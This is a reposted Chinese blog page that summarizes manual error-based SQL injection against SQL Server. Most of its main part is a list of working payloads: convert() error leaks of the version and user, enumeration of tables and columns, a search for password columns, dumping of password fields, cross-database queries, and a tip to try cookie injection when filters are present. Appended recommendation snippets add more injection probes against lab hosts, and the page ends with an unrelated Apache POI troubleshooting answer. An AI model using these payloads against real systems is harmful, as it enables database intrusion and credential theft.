Sql Server 手工注入总结(显错模式)

最新推荐文章于 2025-09-24 14:45:18 发布
转载 最新推荐文章于 2025-09-24 14:45:18 发布 · 7.4k 阅读 · 0

本文介绍了 SQL Server 数据库渗透的实用技巧,包括利用类型转换错误进行信息泄露、获取表名及字段名的方法,以及如何从数据库中抽取具体的数据内容等。文章还提及了跨库查询的技术,并提醒读者注意 ASP+SQL Server 环境下可能存在的 Cookie 注入攻击。
 
 
--显错模式总结,利用类型转换报错。
--1=convert(int,(@@version))
--1=convert(int,(select host_name()))
--and 1=convert(int,(user))
 
--爆表名记录条数。replace(字段名,' ','')
select replace(str(count(*))+'N',' ','') from sysobjects where xtype='U'
--逐条爆表名,www.2cto.com 需要更改是"top 0","top 0"代表第一条数据内容。
select top 1 name from sysobjects where xtype='U' and id not in(select top 0 id from sysobjects where xtype='U')
 
--利用模糊字段关键词找表名,需要更改是"top 0","top 0"代表第一个表名.
select top 1 name from sysobjects where xtype='U' and id not in(select top 0 id from syscolumns where id in(select id from sysobjects where xtype='U') and name like '%pass%' order by id asc)
 
 
--爆表与之对应字段,需要更改的是表名"username"和"top 0","top 0"代表第一条数据内容。
select str(count(*))+'N' from syscolumns where id=(select id from sysobjects where xtype='U' and name='username')
select top 1 name from syscolumns where id=(select id from sysobjects where xtype='U' and name='username') and name not in (select top 0 name from syscolumns where id=(select id from sysobjects where xtype='U' and name='username'))
 
 
--爆对应表,对应字段数据库内容.
--爆数据条数
select str(count(*))+'N' from username
--爆对应字段对应内容,需要替换password,username,id,以及"top 0","top 0"代表第一条数据内容。
select top 1 password from username where id not in (select top 0 id from username)
 
 
--跨库
select top 1 name from ss.dbo.sysobjects where xtype='U' and id not in(select top 0 id from ss.dbo.sysobjects where xtype='U')原理就是那么简单,在测试的过程中学会变通。对于asp+sql server,
 
经常会遇到做了防注入,有时候别忘了cookies注入,效果不错。
 
摘自转自:http://t00ls.net/viewthread. php?tid=20248&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000
 
Sql Server数据库手工注入
渗透之路,攻防之间皆学问
06-13 5561
目录 Sql Server Sql Server数据库的查询语句 union注入 延时注入 这里感谢墨者学院提供的靶场:https://www.mozhe.cn/bug/detail/90 Sql Server SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,释符是 -- 。 QLServer有三个权限级别: sa权限:数据库操作,文件管理,命令执行,册表读取等system。.
SQL Server手工注入方式
渗透之路,攻防之间皆学问
01-04 7443
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
黑客技术入门之sql注入错分享(mssql和mysql),黑客技术零基础入门到精通实战教程!
最新发布
白帽阿叁的博客
09-24 570
MySQL 溢出类注入技术总结 本文介绍了两种MySQL注入方法: 溢出类错 利用大整数溢出:通过~取反操作使数值超出BIGINT范围,配合ABS、EXP、AVG等函数触发错 双精度溢出:使用EXP、COT等函数使数值超出DOUBLE范围 主键重复错 利用rand(0)*2产生重复主键值,结合GROUP BY触发Duplicate entry错误 可配合FLOOR、CEILING、FORMAT等函数使用 文章提供了详细的SQL注入示例和错误特征,并列出可用的函数列表,建议使用Burp进行模糊测
sql server 2008 mysql 手工注入
03-25
本人原创 sql server 2008 mysql 手工注入 里面有源码和数据库文件 还有用于测试的项目
sql server数据库手工注入
GiDunPar的博客
02-05 451
平台:墨者学院 1、老套路,先判断是否存在注入,and 1=1正常,and 1=2异常——存在注入。 2、判断字段数,order by x,3异常,4正常,5又异常,不知道到底是2个字段还是4个字段,先放着。 3、判断回,union select null,null,null,null,union select null,null都是异常。然后尝试union all select n...
SQL手工注入语句
m0_48368237的博客
02-28 752
看看下面的 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count() from sysobjects)>0 mssql ;and (select count() from msysobjects)>0 access 4.注入参数是字符 ‘and&nb
SQLServer从入门到高级(知识点)
shiqifei的博客
08-04 2263
SQLServer知识点总结,内容包括从入门到精通,其中夹杂者实战内容以及实战中的建议。上万字总结,建议收藏保存享用,后续也会持续更新!!
SQL手工注入漏洞测试(MSSQL数据库)
硫酸超的博客
07-29 1228
MSSQL注入https://www.cnblogs.com/xishaonian/p/6173644.html https://www.cnblogs.com/xishaonian/p/6173644.html
SQL手工注入
lebronps的博客
10-05 455
【代码】SQL手工注入
SQL注入-注入
qq_46416934的博客
05-17 867
目录 SQL注入 数据库语句 流程 靶场演示 万能密码漏洞? 万能密码字典 SQL注入 什么是SQL注入 : 用户输入的内容被浏览器当做数据库语句进行执行。 关键点:我们一定要输入**[数据库语句]** 。 我们输入**【数据库语句】,如果这个[网站执行了]**,就说明这个网站,存在数据库注入漏洞。 数据库语句 select 列名 from 表名 where 条件 select 查询 from 来自 where 当···条件成立的时候 流程 第一步:判断网站是否存在漏洞 and 1=1 --> 条件
SQL手工注入完全篇
09-08
SQL手工注入完全篇
SQL注入攻击-手工注入攻击
WS16201224的博客
12-30 455
sql注入是指web程序对用户所输入的数据合法性没有进行判断或过滤不严,攻击者能够通过在web应用程序中事先定义好查询语句中添加额外的sql语句,在管理员不知道的情况下实现非法操作,从而获取数据库的信息以及提权,发送sql注入攻击。对于SQL注入
MSSQL错模式手工注入实现原理思考和实战
www.i201314.net
09-20 958
说到Mssql手工注入,本人喜欢错模式的,为啥呢,因为你只要构造一个语句,不用你一个一个特意的去猜,程序会自动告诉你我们要的信息,省时省力,不像不错模式的盲,可以让你猜上个半天。进入正题,下面来说说我对错模式原理的思考。     错模式,起初也是为了方便程序员修改代码,但是,这正好被我们利用了,我们故意让程序出错来爆出我们要的敏感信息。     上次我说到过having 1=
学习笔记 MSSQL错手注入
weixin_34150224的博客
12-13 157
和朋友一起学习,速度就是快。感谢珍惜少年时。 网上很多都在长篇大论MSSQL错手注入,其实原理只有一小段。如下: ' and(查询一段内容)=1and'C'='Cnvarchar类型(查询一段内容的返回)会自动转换int类型,肯定会转换失败。然后错将nvarchar类型(查询一段内容的返回) 的值示出来。 由这个原理衍生出单字段查询。如下: ' and 0=(SELECT...
72.网络安全渗透测试—[SQL注入篇11]—[SQLSERVER+ASP-注入]
qwsn
01-18 3541
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER+ASP 注入 1、sql server错页面 2、SQLSERVER+ASP 注入示例
12-Web安全—基于SQL Server注入——and,conver,cast
网络安全
07-11 3095
我们知道SQL Server是由微软开发,很优秀的数据库,可以精确地定位错误消息,这点对开发人员非常友好,特别是对于web安全工作者来说,利用SQL Server错的信息对目标系统有效进行渗透测试。 注入的使用场景学习MYSQL注入时已经说过,这里就不再赘述,在Less-5中输入id=1' and 1=(@@version)--+ 进行数据库错: 数据库在执行sql语句时,会把1=(@@version)语句中括号里的内容当做int类型的数字来处理,但@@version本身是nvarch.
墨者学院手工sql注入sql server
qq_52074678的博客
03-09 479
1.测试是否存在sql注入 219.153.49.228:47998/new_list.asp?id=2 and 1=1 回正常 219.153.49.228:47998/new_list.asp?id=2 and 1=2 回错 存在SQL注入 2.猜解字段 219.153.49.228:47998/new_list.asp?id=2 order by 4 回正常 219.153.49.228:47998/new_list.asp?id=2 order by 5 ...
Sql server注入分类之注入
qq_42990434的博客
12-16 519
本章目录:错查询注入语句先统计总共有多少库第一步:获取库名第二步:获取表第三步:获取列名第四步:获取列数据扩展 错查询注入语句 id=8’ //错 id=8 and 1=1 / and 1=2 //1=1 页面返回正常,1=2 页面返回不正常,证明我们的语句代入进去执行了,其实这种判断可以有很多拓展 id=8 and exists(select * from sysobjects) //确实目标是否真的为mssql数据库,页面返回正常则是 id=8and 1=CONVERT(i
import ppt convert Was closed before the data was requested.>java.io.I0Exception->org.apache.poi.openxml4j.util.ZipArchiveFakeEntry.getInputStream:110 这个是使用poi解析ppt爆这个错误是什么原因
08-22
在使用 Apache POI 解析 PPT 文件时,出现 `Was closed before the data was requested` 错误并伴随 `java.io.IOException` 异常,通常与资源管理或文件流的生命周期控制有关。此问题多见于处理基于 ZIP 格式的 Office 文档(如 `.pptx` 文件),Apache POI 使用 `ZipArchiveInputStream` 和 `ZipArchiveFakeEntry` 来解析这些文件中的条目。 以下是可能导致该异常的几个主要原因: 1. **文件流提前关闭** 在读取 PPT 文件的过程中,若文件输入流(`FileInputStream` 或 `InputStream`)被提前关闭,而仍在尝试访问其中的条目数据,则会触发此异常。例如,当使用 `OPCPackage` 或 `XMLSlideShow` 读取 `.pptx` 文件时,若在未完成解析前手动关闭了底层流,后续调用 `getInputStream()` 时会抛出 `IOException`,提示“Was closed before the data was requested”[^1]。 2. **资源泄漏或不当使用** Apache POI 内部对 ZIP 文件的处理依赖于 `ZipArchiveInputStream` 和 `ZipArchiveFakeEntry`,这些类用于遍历 ZIP 条目。如果在解析过程中未能正确获取或保持对某个条目的引用,或在读取之前释放了相关资源,也可能导致此异常。尤其是在多线程环境下,若多个线程并发访问同一个文件流而未进行同步控制,资源竞争可能导致流被提前关闭[^1]。 3. **文件损坏或格式不兼容** 若 PPT 文件本身损坏或并非标准的 Office Open XML 格式(例如,是旧版 `.ppt` 格式但误用 `XSLF` 模块处理),Apache POI 在解析 ZIP 条目时可能无法正确识别内容,导致在获取输入流时抛出异常。此外,某些非标准压缩工具生成的 `.pptx` 文件可能不符合 ZIP 格式规范,也可能引发此类问题[^3]。 4. **内存不足或资源限制** 在处理大型 PPT 文件时,若 JVM 内存不足或系统资源受限,可能导致 POI 在解压 ZIP 条目时无法正常加载流,从而提前关闭输入流并抛出异常。这种情况下,通常会伴随其他资源相关的异常(如 `OutOfMemoryError`)一同出现[^2]。 5. **Apache POI 版本缺陷** 某些 Apache POI 的旧版本中存在与 ZIP 流处理相关的 bug,可能导致在解析 `.pptx` 文件时出现此类异常。建议使用最新稳定版本(如 5.2.3 或以上),以避免已知的 ZIP 流处理问题。 ### 示例代码(正确使用 OPCPackage 读取 PPTX) ```java import org.apache.poi.xslf.usermodel.XMLSlideShow; import java.io.FileInputStream; import java.io.IOException; public class PPTXReader { public static void main(String[] args) { try (FileInputStream fis = new FileInputStream("example.pptx"); XMLSlideShow ppt = new XMLSlideShow(fis)) { // 正确使用 try-with-resources 确保流在使用完毕后才关闭 System.out.println("Number of slides: " + ppt.getSlides().size()); } catch (IOException e) { e.printStackTrace(); } } } ``` ### 建议的解决方法 - 确保使用 `try-with-resources` 结构管理所有流资源,避免手动提前关闭输入流。 - 验证 `.pptx` 文件是否完整且符合 Office Open XML 标准。 - 更新 Apache POI 到最新版本以修复潜在的 ZIP 流处理缺陷。 - 对于大型文件,适当增加 JVM 内存配置(如 `-Xmx` 参数)以防止资源不足。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值